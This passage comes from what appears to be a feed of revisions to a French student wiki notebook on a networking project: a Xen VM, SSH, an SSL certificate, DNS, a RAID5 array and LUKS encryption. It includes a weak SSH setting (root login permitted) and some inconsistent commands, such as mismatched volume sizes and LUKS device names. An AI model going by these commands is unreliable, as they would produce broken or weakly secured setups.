         CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
   &lt;br /&gt;
         SSLEngine on&lt;br /&gt;
         SSLCertificateFile /etc/ssl/certs/jjlddelamuerto.space.crt&lt;br /&gt;
         SSLCertificateKeyFile /etc/ssl/private/jjlddelamuerto.space.key&lt;br /&gt;
         SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
         SSLVerifyClient None&lt;br /&gt;
     &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 root@GreenArrow:/etc/apache2# cat ports.conf &lt;br /&gt;
 Listen 80&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
	 Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;IfModule mod_gnutls.c&amp;gt;&lt;br /&gt;
	Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Un redémarrage du service apache2 est maintenant nécessaire :&lt;br /&gt;
&lt;br /&gt;
 root@GreenArrow:/etc/apache2# service apache2 stop&lt;br /&gt;
 root@GreenArrow:/etc/apache2# service apache2 start&lt;br /&gt;
 root@GreenArrow:/etc/apache2# service apache2 reload&lt;br /&gt;
&lt;br /&gt;
Nous pouvons voir que notre site est maintenant sécurisé, un cadenas vert est bien présent.&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur DNS''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
On commence par modifier les informations de notre nom de domaine sur le site de Gandi. Ensuite, dans ''&amp;quot;Gérer les Glue Records&amp;quot;'', nous modifions les informations concernant notre nom de domaine.&lt;br /&gt;
&lt;br /&gt;
* nom du serveur: ns.banane.space&lt;br /&gt;
* adresse IP: 193.48.57.179&lt;br /&gt;
* serveurs de nom:&lt;br /&gt;
** DNS1: ns.banane.space&lt;br /&gt;
** DNS2: ns6.gandi.net (serveur secondaire de Gandi)&lt;br /&gt;
&lt;br /&gt;
Une fois ces étapes effectuées, nous pouvons passer à la configuration du DNS avec bind. On se place alors dans le dossier /etc/bind de notre machine virtuelle.&lt;br /&gt;
Nous modifions dans un premier temps le fichier named.conf.local afin d'y créer nos zones :&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Sécurisation des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
    1) vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-1 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-2 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-3 -v&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-1,xvdd,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-2,xvde,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-3,xvdf,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
On reconfigure le fichier IMA5-BANANE.cfg en créant 3 nouvelles partitions LVM banane-X de 1 Go associées à notre VM.&lt;br /&gt;
&lt;br /&gt;
    2) xl console IMA5-BANANE&lt;br /&gt;
&lt;br /&gt;
On relance la MV IMA5-BANANE.&lt;br /&gt;
&lt;br /&gt;
    3) apt-get install mdadm&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite installé l paquetage mdadm puis rebooté la MV.&lt;br /&gt;
&lt;br /&gt;
    4) mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdd /dev/xvde /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
Nous créons le volume /dev/md0 pour créer un RAID5 logiciel avec les trois partitions obtenues.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
arrêtez la machine virtuelle, retirez lui une des trois partitions, relancez la. Essayez de remonter votre RAID5, que constatez-vous ? &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
    5) root@IMA5-BANANE:~# mdadm --detail /dev/md0&lt;br /&gt;
 /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 3&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 17:03:20 2017&lt;br /&gt;
          State : clean &lt;br /&gt;
 Active Devices : 3&lt;br /&gt;
 Working Devices : 3&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 2&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0     202       48        0      active sync   /dev/xvdd&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
    6) root@IMA5-BANANE:~# mdadm --detail /dev/md0&lt;br /&gt;
 /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 2&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 18:51:56 2017&lt;br /&gt;
          State : clean, degraded &lt;br /&gt;
 Active Devices : 2&lt;br /&gt;
 Working Devices : 2&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 12&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0       0        0        0      removed&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
 On copie des données sur le RAID5.&lt;br /&gt;
&lt;br /&gt;
    7) root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [===========&amp;gt;.........]  recovery = 59.7% (627140/1047552) finish=0.2min speed=28506K/sec&lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [============&amp;gt;........]  recovery = 64.5% (676392/1047552) finish=0.2min speed=29408K/sec     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 66.2% (695080/1047552) finish=0.2min speed=28961K/sec     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 68.1% (714664/1047552) finish=0.1min speed=28586K/sec&lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [==================&amp;gt;..]  recovery = 94.6% (991996/1047552) finish=0.0min speed=29206K/sec   &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Cryptage des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
 cryptsetup luksFormat -c aes -h sha256 /dev/mmcblk1&lt;br /&gt;
 cryptsetup luksOpen /dev/sdb1 crypt_sd&lt;br /&gt;
 mkfs.ext4 /dev/mapper/crypt_sd&lt;br /&gt;
 mount /dev/mapper/crypt_sd /mnt&lt;br /&gt;
 vi /mnt/test.txt #on marque un texte dans le fichier&lt;br /&gt;
 umount /mnt&lt;br /&gt;
 cryptsetup luksClose crypt_sd&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en réseau de la MV Xen IMA5-BANANE&amp;lt;/span&amp;gt;====&lt;/div&gt;</summary>
		<author><name>Hdelatte</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=46198</id>
		<title>Cahier 2017 groupe n°5</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=46198"/>
				<updated>2017-11-13T10:36:22Z</updated>
		
		<summary type="html">&lt;p&gt;Hdelatte : /* Certification SSL */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Présentation générale'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en contexte&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
Le projet de Réseau Avancé est composé d'une partie commune et d'une tâche particulière par binôme. Ce projet consiste en la configuration d'une architecture réseau avec différentes parties, en plus du câblage et de la configuration des routeurs et commutateurs.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
La partie commune consiste en la création et la mise en réseau d'une machine virtuelle; ainsi que la création d'un site sécurisé avec la configuration du serveur SSH, DNS sécurisé et du certificat SSL. La virtualisation permet de faire fonctionner sur une même machine plusieurs OS isolés ou des logiciels grâce aux machines virtuelles. Au-delà de la réduction des coûts, la virtualisation permet aussi de manipuler et gérer plus facilement des OS. Cependant, on s'oriente de plus en plus vers l'isolation par des conteneurs car ils permettent au sein d'un même OS, d'isoler les ressources matérielles et d'éviter des surcharges.&lt;br /&gt;
&lt;br /&gt;
Notre tâche particulière est donc de réaliser la gestion des conteneurs au sein d'une machine virtuelle configurée en réseau.&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Tâches à effectuer&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
* Création d'une machine virtuelle sur le serveur de virtualisation Cordouan&lt;br /&gt;
* Mettre la machine virtuelle en réseau&lt;br /&gt;
* Configuration des services Internet (Serveur SSH, DNS, DNSSEC, Certificat SSL)&lt;br /&gt;
* Crackage de clé Wi-Fi&lt;br /&gt;
* Créer les différents conteneurs et configurer leur accès au réseau (tâche particulière)&lt;br /&gt;
&lt;br /&gt;
==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Travail effectué'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
                     &lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Création d'une machine virtuelle Xen sur Cordouan&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On commence par créer une machine virtuelle Xen sur le serveur de virtualisation cordouan.insecserv.deule.net. On se connecte tout d'abord en SSH sur le serveur cordouan.&lt;br /&gt;
&lt;br /&gt;
    1) ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
       Mot de passe: mot de passe root habituel&lt;br /&gt;
&lt;br /&gt;
On précise:&lt;br /&gt;
&lt;br /&gt;
* le nom de machine virtuelle: IMA5-BANANE&lt;br /&gt;
* son adresse IP sur le réseau: 193.48.57.179/28&lt;br /&gt;
* le répertoire où créer les disques virtuels: /usr/local/xen&lt;br /&gt;
* le miroir Debian: http://debian.polytech-lille.fr/debian&lt;br /&gt;
* la distribution: jessie (qui est la distribution stable courante)&lt;br /&gt;
&lt;br /&gt;
    2) xen-create-image --hostname=&amp;lt;IMA5-BANANE&amp;gt; --ip 193.48.57.179/28 --dir /usr/local/xen --netmask=255.255.255.240 --gateway=193.48.57.177 --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration de la machine virtuelle pour faire en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte. Installez les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind (voir la partie services).&lt;br /&gt;
&lt;br /&gt;
    3) xl create /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-home -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-var -v&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration en faisant en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte:&lt;br /&gt;
&lt;br /&gt;
* la mémoire attribuée: 512 Mo&lt;br /&gt;
* l'adresse ip de la MV: 193.48.57.179/28&lt;br /&gt;
* bridge: IMA5sc&lt;br /&gt;
&lt;br /&gt;
    4) xl list&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# xl list&lt;br /&gt;
       Name                                        ID   Mem VCPUs	State	Time(s)&lt;br /&gt;
       Domain-0                                     0  1993     8     r-----   52219.3&lt;br /&gt;
       karmeliett                                   1   128     1     -b----    2483.6&lt;br /&gt;
       duvel                                        2   512     1     -b----    4225.6&lt;br /&gt;
       deus                                         3   512     1     -b----    4226.4&lt;br /&gt;
       trappe                                       4   512     1     -b----    4082.4&lt;br /&gt;
       Rincecochon                                  6   512     1     -b----    3788.2&lt;br /&gt;
       IMA5-Durian                                 62   512     1     -b----    3237.7&lt;br /&gt;
       IMA5-BANANE                                 84   512     1     -b----     152.9&lt;br /&gt;
       IMA5-Papaye                                 89   512     1     -b----      35.4&lt;br /&gt;
       IMA5-Ananas                                 91   512     1     -b----      27.0&lt;br /&gt;
&lt;br /&gt;
On vérifie que la MV IMA5-BANANE a bien été créée.&lt;br /&gt;
&lt;br /&gt;
    5) xl console IMA5-BANANE&lt;br /&gt;
&lt;br /&gt;
On lance IMA5-BANANE en utilisant le log root et le mot de passe configuré.&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Services Internet (SSH, DNS sécurisé et certificat SSL)&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On configure à présent les services Internet après avoir acheté un nom de domaine (https://www.banane.space) sur gandi.net pour créer notre site Web sécurisé.&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur SSH''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
Sur notre machine virtuelle, nous avons configuré le fichier sshd_config (PubkeyAuthentication ) :&lt;br /&gt;
&lt;br /&gt;
       root@IMA5-BANANE:~# vim /etc/ssh/sshd_config&lt;br /&gt;
       &lt;br /&gt;
       RSAAuthentication yes&lt;br /&gt;
       PubkeyAuthentication yes&lt;br /&gt;
       #AuthorizedKeysFile     %h/.ssh/authorized_keys&lt;br /&gt;
       PermitRootLogin yes&lt;br /&gt;
       &lt;br /&gt;
       root@IMA5-BANANE:~# service ssh restart&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Certification SSL''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
Premièrement, sur Gandi nous lançons l'étape d'achat d'un certificat SSL. Puis, sur la VM nous générons le CSR grâce à cette commande:&lt;br /&gt;
&lt;br /&gt;
 root@GreenArrow:/etc/apache2/sites-available/clef# openssl req -nodes -newkey rsa:2048 -sha256 -keyout GreenArrow.key -out GreenArrow.csr&lt;br /&gt;
&lt;br /&gt;
 Generating a 2048 bit RSA private key&lt;br /&gt;
&lt;br /&gt;
 If you enter '.', the field will be left blank.&lt;br /&gt;
 -----&lt;br /&gt;
 Country Name (2 letter code) [AU]:FR&lt;br /&gt;
 State or Province Name (full name) [Some-State]:Nord&lt;br /&gt;
 Locality Name (eg, city) []:Lille&lt;br /&gt;
 Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille&lt;br /&gt;
 Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
 Common Name (e.g. server FQDN or YOUR name) []:jjlddelamuerto.space&lt;br /&gt;
 Email Address []:&lt;br /&gt;
 A challenge password []:&lt;br /&gt;
 An optional company name []:&lt;br /&gt;
&lt;br /&gt;
 root@GreenArrow:/etc/apache2/sites-available/clef# ls GreenArrow.csr	GreenArrow.key&lt;br /&gt;
&lt;br /&gt;
 root@GreenArrow:/etc/apache2/sites-available/clef# cat GreenArrow.csr&lt;br /&gt;
&lt;br /&gt;
 -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
 &amp;lt;CSR à renseigner sur Gandi lors de l'achat du certificat&amp;gt;&lt;br /&gt;
 -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Nous continuons donc la procédure pour obtenir le certificat, et attendons donc sa mise en place.&lt;br /&gt;
Pour recevoir le mail contenant le lien pour activer le certificat, nous installons les packages suivants :&lt;br /&gt;
&lt;br /&gt;
root@BANANE:~# apt-get install postfix mailx&lt;br /&gt;
&lt;br /&gt;
Une fois le certificat récupéré, nous les copions tous dans le bon répertoire, puis nous hashons le tout :&lt;br /&gt;
&lt;br /&gt;
 root@GreenArrow:/etc/bind# cp certificat.crt /etc/ssl/certs/jjlddelamuerto.space.crt&lt;br /&gt;
 root@GreenArrow:/etc/bind# cp serveur.key /etc/ssl/private/jjlddelamuerto.space.key&lt;br /&gt;
 root@GreenArrow:/etc/bind# cp GandiStandardSSLCA2.pem /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
 root@GreenArrow:/etc/bind# c_rehash /etc/ssl/certs&lt;br /&gt;
&lt;br /&gt;
Enfin, la dernière étape consiste en la modification des fichiers 000-jjlddelamuerto.space-ssl.conf et ports.conf :&lt;br /&gt;
&lt;br /&gt;
 root@GreenArrow:/etc/apache2/sites-available# cat 000-jjlddelamuerto.space-ssl.conf &lt;br /&gt;
     &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
         ServerName www.jjlddelamuerto.space&lt;br /&gt;
         ServerAlias jjlddelamuerto.space&lt;br /&gt;
         DocumentRoot /var/www/&lt;br /&gt;
         CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
   &lt;br /&gt;
         SSLEngine on&lt;br /&gt;
         SSLCertificateFile /etc/ssl/certs/jjlddelamuerto.space.crt&lt;br /&gt;
         SSLCertificateKeyFile /etc/ssl/private/jjlddelamuerto.space.key&lt;br /&gt;
         SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
         SSLVerifyClient None&lt;br /&gt;
     &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 root@GreenArrow:/etc/apache2# cat ports.conf &lt;br /&gt;
 Listen 80&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
	 Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;IfModule mod_gnutls.c&amp;gt;&lt;br /&gt;
	Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Un redémarrage du service apache2 est maintenant nécessaire :&lt;br /&gt;
&lt;br /&gt;
 root@GreenArrow:/etc/apache2# service apache2 stop&lt;br /&gt;
 root@GreenArrow:/etc/apache2# service apache2 start&lt;br /&gt;
 root@GreenArrow:/etc/apache2# service apache2 reload&lt;br /&gt;
&lt;br /&gt;
Nous pouvons voir que notre site est maintenant sécurisé, un cadenas vert est bien présent.&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur DNS''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
On commence par modifier les informations de notre nom de domaine sur le site de Gandi. Ensuite, dans ''&amp;quot;Gérer les Glue Records&amp;quot;'', nous modifions les informations concernant notre nom de domaine.&lt;br /&gt;
&lt;br /&gt;
* nom du serveur: ns.banane.space&lt;br /&gt;
* adresse IP: 193.48.57.179&lt;br /&gt;
* serveurs de nom:&lt;br /&gt;
** DNS1: ns.banane.space&lt;br /&gt;
** DNS2: ns6.gandi.net (serveur secondaire de Gandi)&lt;br /&gt;
&lt;br /&gt;
Une fois ces étapes effectuées, nous pouvons passer à la configuration du DNS avec bind. On se place alors dans le dossier /etc/bind de notre machine virtuelle.&lt;br /&gt;
Nous modifions dans un premier temps le fichier named.conf.local afin d'y créer nos zones :&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Sécurisation des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
    1) vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-1 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-2 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-3 -v&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-1,xvdd,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-2,xvde,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-3,xvdf,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
